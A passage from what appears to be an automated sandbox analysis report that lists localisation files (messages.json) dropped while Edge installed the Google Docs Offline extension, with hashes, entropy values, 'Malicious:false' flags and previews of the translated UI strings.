                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                  MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                  SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                  SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                  SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                  MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                  SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                  SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                  SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                  MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                  SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                  SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                  SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                  MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                  SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                  SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                  SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                  MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                  SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                  SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                  SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                  MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                  SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                  SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                  SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                  MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                  SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                  SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                  SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                  Encrypted:false
